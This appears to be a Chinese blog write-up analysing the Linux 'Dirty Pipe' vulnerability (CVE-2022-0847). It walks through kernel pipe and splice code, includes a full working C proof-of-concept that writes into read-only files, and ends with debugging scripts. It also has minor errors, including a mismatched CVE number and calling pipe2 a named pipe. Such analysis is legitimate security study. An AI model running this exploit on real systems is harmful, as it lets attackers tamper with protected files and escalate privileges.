CVE-2022-0847: "dirty pipe" 变量未初始化引发的越权写文件

脏脏的管道，破破的exp

[toc]

CVE-2022-0847: “dirty pipe” 变量未初始化引发的越权写文件

0x00. 总结

CVE编号：CVE-2022-0848
受影响linux版本：5.8 ~ 5.16.11, 5.15.25 and 5.10.102
成因：splice 实现零拷贝的过程中，将文件的缓存页添加到pipe_buffer时，未将原有flags进行初始化，导致一定情况下攻击者可以将只读文件进行越权修改。
修复：将变量初始化即可。

0x01. pipe 基础知识

pipe 系统调用 - 创建 pipe

在用户态，我们可以创建管道来实现进程间通信。当在用户态下调用pipe时，会经过如下系统调用：

SYSCALL_DEFINE2(pipe2, int __user *, fildes, int, flags)
{
	return do_pipe2(fildes, flags);
}

SYSCALL_DEFINE1(pipe, int __user *, fildes)
{
	return do_pipe2(fildes, 0);
}

其中，根据pipe系统调用还是pipe2系统调用，会决定是否在do_pipe2函数调用时添加flags，此外没有区别。pipe2也就是我们平时说的“有名管道”，而pipe则是“匿名管道”，我们此处主要关注pipe相关。

跟进系统调用，可以得到其函数调用链如下：

do_pipe2() // 返回给用户
    __do_pipe_flags() // 获取 read 和 write 的文件描述符
    	create_pipe_files() // 对下层调用得到的 inode 进行属性配置
    		get_pipe_inode() // 对下层调用得到的 pipe_inode_info 结构体进行配置
    			alloc_pipe_info() // 核心部分

我们分析alloc_pipe_info部分，其源码如下所示：

struct pipe_inode_info *alloc_pipe_info(void)
{
	struct pipe_inode_info *pipe;
	unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
	struct user_struct *user = get_current_user();
	unsigned long user_bufs;
	unsigned int max_size = READ_ONCE(pipe_max_size);
	
    // 分配 pipe_inode_info 结构体，分配标志为 GFP_KERNEL_ACCOUNT，大小一般为0x88
	pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
	if (pipe == NULL)
		goto out_free_uid;
	
    // pipe_bufs的大小已经大于当前的最大大小
	if (pipe_bufs * PAGE_SIZE > max_size && !capable(CAP_SYS_RESOURCE))
		pipe_bufs = max_size >> PAGE_SHIFT;

	user_bufs = account_pipe_buffers(user, 0, pipe_bufs);

	if (too_many_pipe_buffers_soft(user_bufs) && pipe_is_unprivileged_user()) {
		user_bufs = account_pipe_buffers(user, pipe_bufs, PIPE_MIN_DEF_BUFFERS);
		pipe_bufs = PIPE_MIN_DEF_BUFFERS;
	}
	
    // 用户使用的buf页已经太多
	if (too_many_pipe_buffers_hard(user_bufs) && pipe_is_unprivileged_user())
		goto out_revert_acct;
	
    // 申请pipe_buffer结构体，分配标志为GFP_KERNEL_ACCOUNT
    // 默认情况下申请16个0x28的pipe_buffer结构体，因此默认为kmalloc-0x400(kmalloc-1024)
	pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
			     GFP_KERNEL_ACCOUNT);
	
    // 创建成功则初始化
	if (pipe->bufs) {
		init_waitqueue_head(&pipe->rd_wait);
		init_waitqueue_head(&pipe->wr_wait);
		pipe->r_counter = pipe->w_counter = 1;
		pipe->max_usage = pipe_bufs;
		pipe->ring_size = pipe_bufs;
		pipe->nr_accounted = pipe_bufs;
		pipe->user = user;
		mutex_init(&pipe->mutex);
		return pipe;
	}

out_revert_acct:
	(void) account_pipe_buffers(user, pipe_bufs, 0);
	kfree(pipe);
out_free_uid:
	free_uid(user);
	return NULL;
}

能看到与pipe相关的两个最重要的结构体为pipe_inode_info和pipe_buffer，其中：（直接用了breeeze师傅的注释）：

struct pipe_inode_info {
	struct mutex mutex;
	wait_queue_head_t rd_wait, wr_wait;
	unsigned int head; //pipe_buffer 循环队列的头下标
	unsigned int tail; //pipe_buffer 循环队列的尾下标
	unsigned int max_usage; //管道中允许存在的的最大字节数
	unsigned int ring_size; //pipe_buffer 循环队列的长度
#ifdef CONFIG_WATCH_QUEUE
	bool note_loss;
#endif
	unsigned int nr_accounted;
	unsigned int readers; //读取这个管道的用户数量
	unsigned int writers; //向这个管道写的用户数量
	unsigned int files;
	unsigned int r_counter;
	unsigned int w_counter;
	struct page *tmp_page; // 临时 page
	struct fasync_struct *fasync_readers;
	struct fasync_struct *fasync_writers;
	struct pipe_buffer *bufs;// 指向16个pipe_buffer 结构体
	struct user_struct *user;
#ifdef CONFIG_WATCH_QUEUE
	struct watch_queue *watch_queue;
#endif
};

可以看到其管理了16个pipe_buffer（默认情况下）。而这些pipe_buffer则组成了一个循环队列，如下所示：

在这里插入图片描述

其中pipe->head指向用户write的地方，而pipe->tail则指向用户read的地方，指针都是不断增长的。

其中，读写操作发生在pipe_buffer指向的page中，pipe_buffer的定义如下：

struct pipe_buffer {
	struct page *page; //每个pipe_buffer 结构体管理一个页
	unsigned int offset, len; //记录偏移和长度
	const struct pipe_buf_operations *ops;//ops，指向内核中的全局常量
    //flag是页使用的标志位，比较重要的就是PIPE_BUF_FLAG_CAN_MERGE 代表该页是否可以续写
	unsigned int flags; 
	unsigned long private;
};

其除了指向page结构体，即用来读写数据的缓存区域外，还包含当前buffer的偏移和长度。而ops是一个结构体指针，其指向一个函数表，接触过linux kernel pwn的同学应该并不陌生，其可以被覆盖后用于劫持程序控制流。

而还有一个标志位flags，其中表示当前指向的缓冲区的一些属性，其中PIPE_BUF_FLAG_CAN_MERGE属性是今天的主角，表示当前页是否可以续写。此处先按下不表。

总的来说，我们了解到：

用户态调用pipe创建管道时，会得到一个pipe_inode_info结构体表示当前管道的基本信息，以及16个pipe_buffer结构体，其有一个指向缓冲区的page指针，以及当前缓冲区的一些基本信息。
16个pipe_buffer结构体组成一个环形队列，其中pipe_inode_info中的head和tail分别记录其指向的写和读的区域。

pipe 系统调用 - write 写

当我们调用write向pipe中写数据时，其最终会调用到pipe_write，其主要逻辑部分如下：

static ssize_t
pipe_write(struct kiocb *iocb, struct iov_iter *from)
{
	struct file *filp = iocb->ki_filp;
	struct pipe_inode_info *pipe = filp->private_data;
	unsigned int head;
	ssize_t ret = 0;
	size_t total_len = iov_iter_count(from);
	ssize_t chars;
	bool was_empty = false;
	bool wake_next_writer = false;

	/* Null write succeeds. */
	if (unlikely(total_len == 0))
		return 0;
	...

	head = pipe->head; // 获取到当前的写指针
	was_empty = pipe_empty(head, pipe->tail); // 当前的page是否为空
	chars = total_len & (PAGE_SIZE-1); // 计算得到用户写的不超过一页的长度
    
    // 若写指针指向的页不为空，且用户有数据写，则考虑是否可以在当前页续写
	if (chars && !was_empty) {
		unsigned int mask = pipe->ring_size - 1;
		struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
		int offset = buf->offset + buf->len;
		
        // 若当前页面设置了PIPE_BUF_FLAG_CAN_MERGE属性，则可以续写，则进入该分支
        // 还有一个条件是不能写得超过一页
		if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
		    offset + chars <= PAGE_SIZE) {
			ret = pipe_buf_confirm(pipe, buf);
			if (ret)
				goto out;
			
            // 调用copy_page_from_iter续写内容到当前的page
			ret = copy_page_from_iter(buf->page, offset, chars, from);
			if (unlikely(ret < chars)) {
				ret = -EFAULT;
				goto out;
			}

			buf->len += ret;
			if (!iov_iter_count(from))
				goto out;
		}
	}
	
    // 不能续写，或者是后续内容，正常写
	for (;;) {
		if (!pipe->readers) {
			send_sig(SIGPIPE, current, 0);
			if (!ret)
				ret = -EPIPE;
			break;
		}
	
        // 管道没满
		head = pipe->head;
		if (!pipe_full(head, pipe->tail, pipe->max_usage)) {
			unsigned int mask = pipe->ring_size - 1;
			struct pipe_buffer *buf = &pipe->bufs[head & mask];
			struct page *page = pipe->tmp_page; // pipe的临时页
			int copied;
			
            // 若没有临时页，创建一个新页作为临时页
			if (!page) {
				page = alloc_page(GFP_HIGHUSER | __GFP_ACCOUNT);
				if (unlikely(!page)) {
					ret = ret ? : -ENOMEM;
					break;
				}
				pipe->tmp_page = page;
			}

			/* Allocate a slot in the ring in advance and attach an
			 * empty buffer.  If we fault or otherwise fail to use
			 * it, either the reader will consume it or it'll still
			 * be there for the next write.
			 */
			spin_lock_irq(&pipe->rd_wait.lock);
			
			head = pipe->head;
			if (pipe_full(head, pipe->tail, pipe->max_usage)) {
				spin_unlock_irq(&pipe->rd_wait.lock);
				continue;
			}

			pipe->head = head + 1;
			spin_unlock_irq(&pipe->rd_wait.lock);

			/* Insert it into the buffer array */
			buf = &pipe->bufs[head & mask];
			buf->page = page;
			buf->ops = &anon_pipe_buf_ops;
			buf->offset = 0;
			buf->len = 0;
			if (is_packetized(filp)) // 默认不会进入
				buf->flags = PIPE_BUF_FLAG_PACKET;
			else
				buf->flags = PIPE_BUF_FLAG_CAN_MERGE; // 页面默认会设置PIPE_BUF_FLAG_CAN_MERGE，即可续写
			pipe->tmp_page = NULL;
			
            // 调用copy_page_from_iter来写内容
			copied = copy_page_from_iter(page, 0, PAGE_SIZE, from);
			if (unlikely(copied < PAGE_SIZE && iov_iter_count(from))) {
				if (!ret)
					ret = -EFAULT;
				break;
			}
			ret += copied;
			buf->offset = 0;
			buf->len = copied;

			if (!iov_iter_count(from))
				break;
		}

		...
	return ret;
}

上面代码部分为pipe_write主要的写逻辑，其中：

每个要写的pipe_buffer的页面默认都设置为PIPE_BUF_FLAG_CAN_MERGE，即可以续写
再次写入时，若可以续写的页面不为空，且足够容纳用户数据，则在续写的页面进行续写

0x02. splice “零拷贝” 基础知识

splice能够在两个文件描述符之间传输数据，其函数原型如下：

1
2
3

ssize_t splice(int fd_in, loff_t *off_in, 
               int fd_out, loff_t *off_out, 
               size_t len, unsigned int flags);

其中分别可以指定输入输出文件描述符和偏移，以及长度、标志位。这不难让我们想到sendfile系统调用。但splice系统调用有如下特性：

适用于管道：splice只能在至少有一个文件描述符是管道的情况下才能使用。
零拷贝：数据直接在内核空间传输，无需拷贝到用户空间，提升效率。

对于”零拷贝”，试想场景如下：

1 2	`read(3, buf, 0x20); write(pipe_fd[1], buf, 0x20);`

可以看到该过程需要将数据先读取到用户态下的buf变量中。使用零拷贝的splice则规避了这一点，提升了效率。

而splice实现的原理如下：

即，splice直接将打开的文件映射的page直接放到pipe的缓存页中。

这是因为在linux内核中，为了提升效率，缓存的页会保存一段时间，最近若再有访问到该页的时则可以避免不必要的IO操作。因此，在使用splice零拷贝时，其原理就是将打开的文件的页的缓存页面直接挂入pipe的页面中，若其上有读写操作则直接对该页面进行操作，而不是使用pipe本身的page进行一个中间的过渡。

从源码角度分析一下，其函数调用链如下：

__do_splice()
    do_splice()
    	...
    		copy_page_to_iter_pipe() // 主要过程

这段代码如下：

// linux kernel 5.16.10 /lib/iov_iter.c:384
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
			 struct iov_iter *i)
{
	struct pipe_inode_info *pipe = i->pipe;
	struct pipe_buffer *buf;
	unsigned int p_tail = pipe->tail;
	unsigned int p_mask = pipe->ring_size - 1;
	unsigned int i_head = i->head;
	size_t off;
	
	if (unlikely(bytes > i->count))
		bytes = i->count;
	
    // 传入的值不是0字节
	if (unlikely(!bytes))
		return 0;

	if (!sanity(i))
		return 0;
	
	off = i->iov_offset; // 偏移，设置为0不进入分支即可
	buf = &pipe->bufs[i_head & p_mask]; // buf 为当前 head 的 pipe_buffer
	if (off) {
		if (offset == off && buf->page == page) {
			/* merge with the last one */
			buf->len += bytes;
			i->iov_offset += bytes;
			goto out;
		}
		i_head++;
		buf = &pipe->bufs[i_head & p_mask];
	}
    // 管道不能满
	if (pipe_full(i_head, p_tail, pipe->max_usage))
		return 0;
	
    // buf的ops写为文件页的ops
	buf->ops = &page_cache_pipe_buf_ops;
	get_page(page); // 主要是让page的_count的值（引用计数？）加一，避免该page被内核直接释放掉
	buf->page = page; // pipe_buffer的page现在指向文件缓存页的page
	buf->offset = offset;
	buf->len = bytes;

	pipe->head = i_head + 1;
	i->iov_offset = offset + bytes;
	i->head = i_head;
out:
	i->count -= bytes;
	return bytes;
}

0x03. 漏洞成因

上面已经提到splice的原理。而splice调用的copy_page_to_iter_pipe函数中：

static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t by
 		return 0;
 
 	buf->ops = &page_cache_pipe_buf_ops;
	// buf->flags = 0; // 修复的时候才加上的
 	get_page(page);
 	buf->page = page;
 	buf->offset = offset;

可以看到这里没有对改入后的pipe_buffer结构体中的flags初始化来清空。

因此，若原本pipe_buffer结构体中flags标志位带有PIPE_BUF_FLAG_CAN_MERGE标志，则不会被清空。

此时若再对pipe调用一次write来写数据，则会进入如下分支：

head = pipe->head; // 现在新的head指向挂入的文件缓存页
was_empty = pipe_empty(head, pipe->tail); // 不为空
chars = total_len & (PAGE_SIZE-1); // 写入的数据，不会为0
if (chars && !was_empty) {
    unsigned int mask = pipe->ring_size - 1;
    struct pipe_buffer *buf = &pipe->bufs[(head - 1) & mask];
    int offset = buf->offset + buf->len;
	
    // 是否有该属性，我们通过读写一整个管道后已经带有该属性。挂入文件页后并没有清空。
    // 因此进入该分支进行续写
    if ((buf->flags & PIPE_BUF_FLAG_CAN_MERGE) &&
        offset + chars <= PAGE_SIZE) {
        ret = pipe_buf_confirm(pipe, buf);
        if (ret)
            goto out;
		
        // 写内容，造成越权写
        ret = copy_page_from_iter(buf->page, offset, chars, from);
        if (unlikely(ret < chars)) {
            ret = -EFAULT;
            goto out;
        }

        buf->len += ret;
        if (!iov_iter_count(from))
            goto out;
    }
}

0x04. 漏洞利用：编写poc

按照上述漏洞来编写exp，大致流程如下：

打开待覆写文件，从而让文件的缓存页留在内存中
建立管道，计算管道的大小，向管道写数据填满管道
从管道读数据清空管道，此时每一个管道中的pipe_buffer都被写上了PIPE_BUF_FLAG_CAN_MERGE位
调用splice零拷贝，从而将文件的缓存页挂入pipe_buffer，但flag未清空
再次向管道写数据，触发漏洞，向文件缓存页进行续写

#include "ltfallkernel.h"
#include <sys/stat.h>

#ifndef PAGE_SIZE
#define PAGE_SIZE 0x1000
#endif

int main(int argc, char **argv)
{
    if (argc != 4)
    {
        error("Usage: %s [TARGET_FILE] [OFFSET] [DATA].", argv[0]);
        exit(0);
    }

    int pipe_fd[2];

    const char *const path = argv[1];
    size_t offset = strtoul(argv[2], NULL, 0);
    const char *const data = argv[3];
    const size_t data_size = strlen(data);

    /* dirty pipe 写入文件不能从第一字节开始，准确的说是每个页的第一字节开始 */
    if (offset % PAGE_SIZE == 0)
    {
        err_exit("Writing at a page boundary is NOT ALLOWED.");
    }

    /* dirty pipe 不能跨页写入文件 */
    const size_t next_page = (offset | (PAGE_SIZE - 1)) + 1; // 计算下一个页面的位置
    const size_t end_offset = offset + (size_t)data_size;    // 计算欲写入的结尾位置
    if (end_offset > next_page)
    {
        err_exit("Writing across a page boundary is NOT ALLOWED.");
    }

    /* 打开文件，检查offset、写入长度等合法性 */
    const int fd = open(path, O_RDONLY);
    if (fd < 0)
    {
        error("Failed to open the TARGET file: %s.", path);
        exit(0);
    }

    struct stat st;
    if (fstat(fd, &st))
    {
        err_exit("Failed to fstat.");
    }
    if (offset > st.st_size)
    {
        error("Offset %d larger than the file size is NOT ALLOWED.");
        exit(0);
    }
    if (end_offset > st.st_size)
    {
        error("CANNOT enlarge the TARGET file.");
    }

    /* 建立管道 */
    if (pipe(pipe_fd) < 0)
    {
        err_exit("Failed to create pipe.");
    }

    // 通过 fcntl 查看管道的大小
    const unsigned int pipe_size = fcntl(pipe_fd[1], F_GETPIPE_SZ);
    static char buffer[0x1000];


    // 写管道，将管道填满，从而设置PIPE_BUF_FLAG_CAN_MERGE标志
    unsigned int r = pipe_size;
    while (r > 0)
    {
        unsigned int n = r > sizeof(buffer) ? sizeof(buffer) : r;
        write(pipe_fd[1], buffer, n);
        r -= n;
    }

    // 通过读来清空管道
    r = pipe_size;
    while (r > 0)
    {
        unsigned int n = r > sizeof(buffer) ? sizeof(buffer) : r;
        read(pipe_fd[0], buffer, n);
        r -= n;
    }

    /* 经过上面的操作，如果某个页面被关联到pipe_buffer，那这个页面就可能被merge */
    --offset;
    size_t nbytes = splice(fd, &offset, pipe_fd[1], NULL, 1, 0);
    if (nbytes < 0)
    {
        err_exit("splice failed.");
    }

    if(nbytes == 0){
        err_exit("Too short to splice.");
    }

    nbytes = write(pipe_fd[1], data, data_size);
    if(nbytes < 0){
        err_exit("write failed.");
    }

    if(nbytes < data_size){
        err_exit("short write.");
    }

    success("All writes done.");
    return 0;
}

0x05. 调试分析

这里我自己编译了linux 5.16.10版本的代码，常见保护全开。

qemu启动脚本如下（现在关闭kaslr以便于调试，运行exp时应该开启）：

#!/bin/sh
qemu-system-x86_64 \
    -m 128M \
    -kernel ./bzImage \
    -initrd  ./rootfs.cpio \
    -monitor /dev/null \
    -append "root=/dev/ram rdinit=/sbin/init console=ttyS0 oops=panic panic=1 loglevel=3 quiet nokaslr" \
    -cpu kvm64,+smep,+smap \
    -smp cores=2,threads=1 \
    -nographic \
    -s

使用调试脚本如下：

#!/bin/bash

KERNEL_MODULE="vmlinux"
PORT="1234"
EXPLOIT="core/exploit"

gdb -q \
    -ex "add-symbol-file $KERNEL_MODULE" \
    -ex "add-symbole-file $EXPLOIT" \
    -ex "file $KERNEL_MODULE" \
    -ex "file $EXPLOIT" \
    -ex "target remote:$PORT"

启动内核，运行调试脚本，先暂停到exp经过splice后，触发漏洞的write的行，我这里是101：

随后，运行脚本：

下断点到pipe_write，并使用dir，添加源码路径：

运行程序，暂停到pipe_write：

使用b pipe.c:458，下断点到458行：

查看pipe_buf[0]，发现已经挂入了缓存文件page的物理页，并且即将进入下面的分支执行：

可以根据ops看出pipe_bufs[0]即为文件缓存页面的page，且flags=16，即为PIPE_BUF_FLAG_CAN_MERGE的值。

0x06. Q&A

- 为什么`PIPE_BUF_FLAG_CAN_MERGE`未初始化会影响到文件本身的`page`？

笔者的疑问。这是因为实际上这个标志位是位于pipe_buffer结构体上的，而将文件缓存页挂入时，实际上也是挂入了pipe_buffer的page指针中。因此该pipe_buffer上的PIPE_BUF_FLAG_CAN_MERGE标志位仍然保留。

- 漏洞利用时为什么需要将管道填满再清空？

笔者刚开始看到这个漏洞的时候有这个疑问，为什么不简单的在当前页面写一字节数据，如此便可以使得当前页面就有PIPE_BUF_FLAG_CAN_MERGE标志了，就可以触发dirty pipe漏洞。那么为什么还要先填满管道再清空呢？

经过调试，在splice将文件缓存页面挂入pipe_buffer的时候，会将head+1并指向这个文件的新缓存页。因此，若只是写了1字节，那么挂入文件缓存页后再调用pipe_write时，自然该页就没有PIPE_BUF_FLAG_CAN_MERGE标志，就无法再触发漏洞越权写了。

因此，需要先填满再清空pipe，如此，每一页都会挂上PIPE_BUF_FLAG_CAN_MERGE标志。~~感觉有点漏洞百出了~~（👈你行你写内核）